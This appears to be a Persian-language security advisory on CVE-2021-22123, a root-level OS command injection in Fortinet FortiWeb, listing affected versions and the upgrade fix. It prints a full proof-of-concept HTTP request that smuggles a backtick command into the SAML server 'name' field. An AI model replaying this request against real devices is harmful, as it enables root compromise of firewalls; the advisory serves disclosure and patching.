اسیب پذیری اجرای دستورات سیستمی در فورتی وب Fortiweb
اسیب پذیری اجرای دستورات سیستمی در فورتی وب Fortiweb – Fortinet FortiWeb OS Command Injection
طی چند روز گذشته اسیب پذیری روز صفرم در محصولات دیوار اتش تحت وب fortiweb کشف شد. از طریق این اسیب پذیری که جزییات ان در وب سایت rapid7 بیان شده است مهاجم میتواند از طریق فیلد نام در درخواست تنظیم سرور saml اقدام به تزریق کد نماید و این کدهای سیستمی با دسترسی root اجرا میشوند.
وب سرویس اسیب پذیر به شرح زیر است :
POST /api/v2.0/user/remoteserver.saml HTTP/1.1 Host: [redacted] Cookie: [redacted] User-Agent: [redacted] Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://[redacted]/root/user/remote-user/saml-user/ X-Csrftoken: 814940160 Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412 Content-Length: 3068 Origin: https://[redacted] Dnt: 1 Te: trailers Connection: close -----------------------------94351131111899571381631694412 Content-Disposition: form-data; name="q_type" 1 -----------------------------94351131111899571381631694412 Content-Disposition: form-data; name="name" `touch /tmp/vulnerable`
در کد فوق تابع touch تزریق شده است.
لیست محوصلات اسیب پذیر :
FortiWeb version 6.4.0 and below.
FortiWeb version 6.3.14 and below.
FortiWeb version 6.2.4 and below.
راهکار رفع مشکل :
به روز رسانی تک تک محصولات فوق به نسخه امن زیر می باشد.
Upgrade to upcoming FortiWeb 6.3.15 or above.
Upgrade to upcoming FortiWeb 6.4.1 or above.
Upgrade to upcoming FortiWeb 6.2.5 or above.
در اخر برای فراخونی متد فوق حتما باید کاربر احراز هویت شده باشد.
این اسیب پذیری با شناسه CVE-2021-22123 شناخته میشود.
دیدگاهتان را بنویسید
برای نوشتن دیدگاه باید وارد بشوید.